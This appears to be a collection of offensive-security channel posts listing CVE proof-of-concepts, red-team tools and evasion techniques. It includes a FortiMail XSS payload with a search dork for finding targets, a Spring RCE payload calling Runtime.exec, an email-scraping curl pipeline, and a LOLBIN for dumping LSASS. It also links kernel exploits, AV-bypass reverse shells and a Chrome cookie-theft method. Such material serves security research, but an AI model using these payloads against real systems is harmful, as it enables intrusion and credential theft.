Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062)

An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.

PoC:
https://example/fmlurlsvc/?=&url=https%3A%2F%https://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Payload:
https%3A%2F%https://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Dork:
inurl:/fmlurlsvc/

#fortinet #forimail #xss

KnockOutlook

KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements.

https://github.com/eksperience/KnockOutlook

#exchange #outlook #com #recon

Relaying Kerberos over DNS using krbrelayx and mitm6

New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services.

https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/

#ad #kerberos #relay #mitm6

OSINT Tip

Quickly scrape email addresses from a site with this simple curl command

cat targets.txt | xargs -n1 -I{} curl -s https://{} | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort -u

#osint #tip #curl #email #recon

✅ A tip for obtaining NT hash from GenericWrite/All privileges. Works for both user and machine accounts.

Windows Event Log Evasion via Native APIs

Some native Windows API calls can be used to install services WITHOUT generating correlating entries in the event log. This was seen in Stuxnet.

https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html

#edr #event #log #evasion

ntTraceControl — Powershell Event Tracing Toolbox

Want to simulate any ETW logs using powershell, even the security one?
Do you want to import any evtx files into the current eventlog session?

ntTraceControl is a set of Powershell commands to forge/generate Windows logs. Simply put, ntTraceControl supports Detection teams by simplifying the testing of detection use cases and alerts without using complex infrastructure, tools, or the testing of vulnerabilities.

https://github.com/airbus-cert/ntTraceControl

#etw #simulate #powershell #redteam #blueteam

CVE-2022-0995

This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component.

It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.

The exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely.

https://github.com/Bonfee/CVE-2022-0995

#linux #lpe #exploit #cve

Azure Dominance Paths

You are looking for a comprehensive map of Azure and Azure AD attack paths?
Look no further, this is the right blog for you.

https://cloudbrothers.info/en/azure-dominance-paths/

#azure #cloud #redteam #blueteam

CVE-2022-27666

This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.

Research:
https://etenal.me/archives/1825

Exploit:
https://github.com/plummm/CVE-2022-27666

#ubuntu #lpe #linux

LDAP relays for initial foothold in dire situations

https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html

#ad #relay #attack #adcs #redteam

PSSW100AVB

This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)

https://github.com/tihanyin/PSSW100AVB

#av #evasion #amsi #powershell #ps1

SpringShell: Spring Core RCE
(CVE-2022-22963)

PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

Research:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

Exploit:
https://github.com/craig/SpringCore0day

#spring #exploit #rce #cve

LOLBIN to dump LSASS

Path:
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

Binary:
DumpMinitool.exe

#lolbin #lsass #dump

The Bug Hunter Methodology

PDF:
https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf

#bugbounty #methodology #xmind

Spring4Shell Scan

A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities

Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.

https://github.com/fullhunt/spring4shell-scan

#spring4shell #spring #scan #tools

Unmanaged Code Execution with .NET Dynamic PInvoke

https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/

#edr #evasion #pinvoke #csharp #blog

Rockyou for Web Fuzzing

This is a wordlist for fuzzing purposes made from the best wordlists currently available, lowercased and deduplicated later with duplicut, added cleaner from BonJarber.

The lists used have been some selected within these repositories:

— fuzzdb
— SecLists
— xmendez
— minimaxir
— TheRook
— danielmiessler
— swisskyrepo
— 1N3
— cujanovic
— lavalamp
— ics-default
— jeanphorn
— j3ers3
— nyxxxie
— dirbuster
— dotdotpwn
— hackerone_wordlist
— commonspeak2
— bruteforce-list
— assetnote

https://github.com/six2dez/OneListForAll

#web #fuzzing #wordlist

Remotely Dumping Chrome Cookies

The method in this blog post does not require the remote debugger or Keychain (macOS)/DPAPI (Windows) access and applies to Chromium-based browsers in general

https://cedowens.medium.com/remotely-dumping-chrome-cookies-revisited-b25343257209

#chrome #cookie #dump #blog